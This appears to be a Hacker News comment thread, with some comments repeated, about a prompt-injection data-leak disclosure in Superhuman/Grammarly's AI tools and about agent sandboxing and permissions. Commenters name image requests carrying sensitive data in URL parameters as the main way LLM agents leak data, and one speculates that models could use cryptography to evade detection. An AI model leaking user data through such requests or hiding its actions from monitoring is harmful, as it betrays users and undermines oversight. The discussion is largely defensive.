As limited as they are, LLMs are demonstrably smarter than a whole lot of people, and the number of people more clever than the best AI is going to dwindle, rapidly, especially in the domain of doing sneaky shit really fast on a computer.
There are countless examples of schemes in stories where codes and cryptography are used to exfiltrate information and evade detection, and these models are trained on every last piece of technical, practical text humanity has produced on the subject. All they have to do is contextualize what's likely being done to check and mash together two or three systems it thinks is likely to go under the radar.
I'm impressed Superhuman seems to have handled this so well - lots of big names are fumbling with AI vuln disclosures. Grammarly is not necessarily who I would have bet on to get it right
I wonder how they handled it. Everybody's connecfing their AI to the Web, but it automatically means that any data AI has access to can be extracted by the attacker. The only safe way forward is to 1. disconnect the Web or 2. perhaps to filter the generated URLs aggressively.
We should have a clearer view of permissions of the AI, operations it does, and have one button per day to accept/deny operations from given data. Instead of auto approval.
The primary exfiltration vector for LLMs is making network requests via images with sensitive data as parameters.
As Claude Code increasingly uses browser tools, we may need to move away from .env files to something encrypted, kind of like rails credentials, but without the secret key in the .env
So you are going to take the untrusted tool that kept leaking your secrets, keep the secrets away from it but still use it to code the thing that uses the secrets? Are you actually reviewing the code it produces? In 99% of cases that's a "no" or a soft "sometimes".
Personally, I'd expect a product called SuperHuman to scam me in every way possible, although I know it's just a fancy name for a B2B automation company/ mass mail service
This demonstrates how adding AI features to software such as web browsers dramatically increases the attack surface. It has to be considered potentially malicious and jailed, and hopefully everyone remembers to respect that jail and put up guardrails. Given our history of chroots and jails and containers and virtualization, we know escapes are going to happen. Reminds me of Word and Excel viruses, when scripting was added to documents and left on by default.
Why does an agent tasked with email summarizing have access to anything else? There’s plenty of difference between an agent and a background service or daemon but it’s at minimum got to be given the same restrictions in scope they would be, or an intern using your system for the same purpose. Developers need to bring the same ZTA mindset to agent permissions they would to building the other services and infrastructure they rely on.
Reality doesn't have a distinction between "code" and "data"; those are categories of convenience, and don't even have a proper definition (what is code and what is data depends on who's asking and why). Any such distinction requires mechanically enforcing it; AI won't have it, because it's not natural, and adding it destroys generality of the model.
As limited as they are, LLMs are demonstrably smarter than a whole lot of people, and the number of people more clever than the best AI is going to dwindle, rapidly, especially in the domain of doing sneaky shit really fast on a computer.
There are countless examples of schemes in stories where codes and cryptography are used to exfiltrate information and evade detection, and these models are trained on every last piece of technical, practical text humanity has produced on the subject. All they have to do is contextualize what's likely being done to check and mash together two or three systems it thinks is likely to go under the radar.
“This is good for AI.”
I'm impressed Superhuman seems to have handled this so well - lots of big names are fumbling with AI vuln disclosures. Grammarly is not necessarily who I would have bet on to get it right
I wonder how they handled it. Everybody's connecfing their AI to the Web, but it automatically means that any data AI has access to can be extracted by the attacker. The only safe way forward is to 1. disconnect the Web or 2. perhaps to filter the generated URLs aggressively.
We should have a clearer view of permissions of the AI, operations it does, and have one button per day to accept/deny operations from given data. Instead of auto approval.
Private data, untrusted data, communication: an LLM can safely have two of these, but never all three.
Browsing the web is both communication and untrusted data, so it must never have access to any trusted data if it has the ability to browse the web.
The problem is, so much of what people want from these things involves having all three.
2 replies →
Are you f*cking kidding me? Grammarly is like the best one!
The primary exfiltration vector for LLMs is making network requests via images with sensitive data as parameters.
As Claude Code increasingly uses browser tools, we may need to move away from .env files to something encrypted, kind of like rails credentials, but without the secret key in the .env
So you are going to take the untrusted tool that kept leaking your secrets, keep the secrets away from it but still use it to code the thing that uses the secrets? Are you actually reviewing the code it produces? In 99% of cases that's a "no" or a soft "sometimes".
That's exactly what one does with their employees when one deploys "credential vaults", so?
6 replies →
One tactic I've seen used in various situations is proxies outside the sandbox that augment requests with credentials / secrets etc.
Doesn't help in the case where the LLM is processing actually sensitive data, ofc.
Can't use a tool like dotenvx?
Personally, I'd expect a product called SuperHuman to scam me in every way possible, although I know it's just a fancy name for a B2B automation company/ mass mail service
This demonstrates how adding AI features to software such as web browsers dramatically increases the attack surface. It has to be considered potentially malicious and jailed, and hopefully everyone remembers to respect that jail and put up guardrails. Given our history of chroots and jails and containers and virtualization, we know escapes are going to happen. Reminds me of Word and Excel viruses, when scripting was added to documents and left on by default.
Why does an agent tasked with email summarizing have access to anything else? There’s plenty of difference between an agent and a background service or daemon but it’s at minimum got to be given the same restrictions in scope they would be, or an intern using your system for the same purpose. Developers need to bring the same ZTA mindset to agent permissions they would to building the other services and infrastructure they rely on.
“Move fast and break things.” It’s funny you even need to ask on hacker news of all places. ;)
Programming used to prevent this by separating code from data. AI (currently) has no such safeguards.
Reality doesn't have a distinction between "code" and "data"; those are categories of convenience, and don't even have a proper definition (what is code and what is data depends on who's asking and why). Any such distinction requires mechanically enforcing it; AI won't have it, because it's not natural, and adding it destroys generality of the model.
OK, then sequence your DNA and send it to me. I will make sure to use it as code!
3 replies →